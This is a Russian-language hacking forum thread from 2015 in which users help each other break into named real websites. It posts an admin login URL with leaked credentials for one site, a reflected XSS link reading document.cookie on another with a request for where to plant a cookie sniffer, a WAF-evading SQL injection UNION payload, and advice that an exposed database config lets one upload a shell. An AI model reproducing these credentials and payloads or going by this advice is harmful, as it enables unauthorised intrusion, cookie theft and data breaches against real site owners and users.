HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 11.08.2015, 21:11
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Он фильтрует не содержимое файла, без разницы что там, eval или echo.

Он фильтрует заголовки

код типа пропустил но выполнить не удалось

Код:
Code:
‰PNG
   
IHDR       ђwSЮ       pHYs     љњ   tIMEЯ
’ьdп   IDATЧcшяя? ююЬМYз    IEND®B`‚
 
Ответить с цитированием

  #452  
Старый 11.08.2015, 21:14
blackhead
Guest
Сообщений: n/a
Провел на форуме:
5407

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((

PS

Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
 
Ответить с цитированием

  #453  
Старый 11.08.2015, 23:00
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

софт со своим словарём.

Цитата:
Сообщение от blackhead  
blackhead said:

Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
 
Ответить с цитированием

  #454  
Старый 12.08.2015, 15:40
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от blackhead  
blackhead said:

Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
http://content.oscar-k.dk/index.php?signIn=1

seba:12345
 
Ответить с цитированием

  #455  
Старый 12.08.2015, 17:25
Chudak
Guest
Сообщений: n/a
Провел на форуме:
404

Репутация: 0
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:

Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
 
Ответить с цитированием

  #456  
Старый 12.08.2015, 22:08
blackhead
Guest
Сообщений: n/a
Провел на форуме:
5407

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
 
Ответить с цитированием

  #457  
Старый 13.08.2015, 02:08
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg
 
Ответить с цитированием

  #458  
Старый 13.08.2015, 02:23
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Chudak  
Chudak said:

Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
Код:
Code:
place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20--+
Инъекция в table_references.
 
Ответить с цитированием

  #459  
Старый 13.08.2015, 03:16
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд

DATABASE HOSTNAME - есть

DATABASE USERNAME - есть

DATABASE PASSWORD - есть

DATABASE NAME - есть

DATABASE PORT - есть

И ещё асякие конфигурации там вроде даже есть привязка по IP адресам

Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
 
Ответить с цитированием

  #460  
Старый 13.08.2015, 12:27
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
Серьёзная уязвимость, можно управлять БД, залить шелл, в общем что угодно сделать с сайтом.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ